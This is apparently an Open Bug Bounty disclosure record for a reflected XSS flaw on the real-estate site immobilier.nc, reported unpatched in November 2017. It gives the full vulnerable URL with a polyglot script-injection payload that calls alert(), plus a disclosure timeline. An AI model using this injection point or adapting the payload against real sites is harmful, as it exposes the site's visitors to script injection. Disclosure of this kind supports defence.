Vulnerable URL:
http://immobilier.nc/recherche?section=offres_location&bien;=&prix;_location=%27;alert(/XSSPOSED/)//%27;alert(/XSSPOSED/)//%22;alert(/XSSPOSED/)//%22;alert(/XSSPOSED/)//--%3E%3C/sCRipT%3E%22%3E%27%3E%3CsCRipT%3Ealert(/XSSPOSED/)%3C/sCRipT%3E&prix;_vente=&pays;=nc&ville;=noum%C3%A9a&quartier;=∥_page=25&orderBy;=&orderDirection;=DESC&moteurRecherche;_option=
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
15.11.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
879327 |
VIP website status: |
No |
Check immobilier.nc SSL connection: |
(Grade: A) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
17 August, 2017 01:51 GMT |
Generic security notifications sent to website owner |
17 August, 2017 01:54 GMT |
Vulnerability details disclosed by researcher |
15 November, 2017 02:31 GMT |